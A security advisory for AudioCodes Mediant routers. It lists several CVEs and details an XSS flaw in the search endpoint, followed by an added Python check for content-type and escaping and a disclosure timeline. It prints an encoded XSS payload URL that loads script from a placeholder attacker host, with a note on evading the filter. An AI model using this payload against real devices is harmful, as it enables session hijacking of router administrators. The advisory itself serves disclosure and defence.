AudioCodes Mediant family of multi-service business routers (MSBRs) offers service providers a range of all-in-one SOHO, SMB and SME routers combining access, data, voice and security into a single device.[1]
During our research we found a DoS (CVE-2019-9228), an XSS (CVE-2019-9230) and a CSRF (CVE-2019-9231) vulnerability. We could also gain access to the Quagga VTYs (CVE-2019-9229).
A cross-site scripting (XSS) vulnerability in the search function of the management web interface allows remote attackers to inject arbitrary JS or HTML code via the keyword parameter. This is possible because a wrong content-type header (text/html instead of application/json) is set.
/SearchResults.json
Parameter: keyword
An attacker could load external JavaScript code from a web server. The values are converted to uppercase and the length of the URL is limited. The attacker can host a file named "A" with the content alert("XSS"); on their web server and trigger the XSS via the following URL:
http://<ROUTERIP>/SearchResults.json?keyword=<script+src+%254D+http%253A//<ATTACKERIP>/a></script>
The encoding has to be applied for filter evasion.
Affected versions: F7.20A to F7.20A.253
Update to F7.20A.254 or higher.
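The root cause described above, a JSON endpoint answering with text/html, can be checked from the response alone. The following is an added example, not code from this advisory or from AudioCodes: build_search_response is a hypothetical model of the handler, the JSON body shape is assumed, and the sample keyword is a constructed harmless marker.

```python
import json

SAMPLE_KEYWORD = "<b>probe</b>"  # constructed, harmless markup marker

def build_search_response(keyword, hardened=True):
    """Hypothetical model of a /SearchResults.json handler: (headers, body)."""
    if hardened:
        # Serialize with a JSON encoder, then escape markup characters so the
        # body stays inert even if a client ignores the content type.
        body = json.dumps({"keyword": keyword, "results": []})
        for ch, esc in (("<", "\\u003c"), (">", "\\u003e"), ("&", "\\u0026")):
            body = body.replace(ch, esc)
        headers = {"Content-Type": "application/json; charset=utf-8",
                   "X-Content-Type-Options": "nosniff"}
    else:
        # Behaviour the advisory describes: uppercased value reflected into a
        # response labelled text/html (body shape is an assumption).
        body = '{"keyword": "%s", "results": []}' % keyword.upper()
        headers = {"Content-Type": "text/html"}
    return headers, body

def audit_json_response(path, headers, body):
    """Return a list of findings for a response from a .json endpoint."""
    findings = []
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if path.split("?")[0].endswith(".json") and ctype != "application/json":
        findings.append("content type is %r, expected application/json" % ctype)
    if h.get("x-content-type-options", "").lower() != "nosniff":
        findings.append("missing X-Content-Type-Options: nosniff")
    if "<" in body or ">" in body:
        findings.append("unescaped angle brackets reflected in body")
    return findings

if __name__ == "__main__":
    path = "/SearchResults.json?keyword=probe"
    for label, hardened in (("as described", False), ("hardened", True)):
        headers, body = build_search_response(SAMPLE_KEYWORD, hardened)
        print(label, audit_json_response(path, headers, body) or "no findings")
```

The same audit function can be pointed at headers and bodies captured from a device before and after the firmware update.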
2019/02/14 | vendor contacted |
2019/02/14 | initial vendor response |
2019/02/14 | vendor informs about start of review process |
2019/02/15 | vendor requests further details |
2019/02/15 | further details provided |
2019/02/18 | vendor informs about detail analysis |
2019/02/19 | vendor confirmation, planned fixes and roadmap provided |
2019/03/01 | CVEs assigned |
2019/06/28 | vendor informs that planned fixes are published |